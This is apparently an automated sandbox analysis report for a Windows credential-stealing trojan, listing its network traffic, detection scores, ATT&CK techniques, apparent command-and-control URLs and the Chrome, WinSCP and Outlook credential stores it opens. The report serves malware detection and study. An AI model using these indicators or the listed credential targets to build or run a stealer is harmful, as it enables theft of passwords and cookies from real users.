Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.21.20:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.21.20:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.54.82.13:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.12.6:443 -> 192.168.2.6:49781 version: TLS 1.2

System Summary:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Section loaded: msxml3.dll			Jump to behavior

Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 00000001.00000003.337105580.0000000002BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =

Source: classification engine

Classification label: mal72.spyw.winEXE@1/1@25/8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Mutant created: \Sessions\1\BaseNamedObjects\53E61D202B0F807656615

Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Virustotal: Detection: 66%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Metadefender: Detection: 18%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	ReversingLabs: Detection: 79%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Registry key enumerated: More than 171 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Process token adjusted: Debug

Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	DLL Side-Loading1	Masquerading1	OS Credential Dumping1	Process Discovery11	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	DLL Side-Loading1	Credentials in Registry1	System Information Discovery23	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Non-Application Layer Protocol3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Remote System Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	66%	Virustotal		Browse
SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	24%	Metadefender		Browse
SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	79%	ReversingLabs	Win32.Trojan.Glupteba
SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.1.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
bdns.im	1%	Virustotal	Browse
bdns.by	4%	Virustotal	Browse
bdns.nu	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://bdns.link/r/kpotuvorot10.bit	0%	Avira URL Cloud	safe
http://dolboeb1701.com/bgczXibj92HSlSCK/login.php	0%	Avira URL Cloud	safe
https://bdns.pro/	0%	Avira URL Cloud	safe
https://bdns.pro/$	0%	Avira URL Cloud	safe
https://bdns.im/r/kpotuvorot10.bit-u	0%	Avira URL Cloud	safe
https://bdns.nu/l	0%	Avira URL Cloud	safe
https://bdns.io/r/kpotuvorot10.bitqu	0%	Avira URL Cloud	safe
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php	0%	Avira URL Cloud	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://r3.i.lencr.org/0	0%	URL Reputation	safe
http://r3.i.lencr.org/0	0%	URL Reputation	safe
http://r3.i.lencr.org/0	0%	URL Reputation	safe
https://bdns.im/	0%	Avira URL Cloud	safe
https://bdns.pro/r/kpotuvorot10.bit	0%	Avira URL Cloud	safe
http://dolboeb1701.com/	0%	Avira URL Cloud	safe
https://bdns.pro/r/kpotuvorot10.bitr~	0%	Avira URL Cloud	safe
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
https://dotbit.me/	0%	Avira URL Cloud	safe
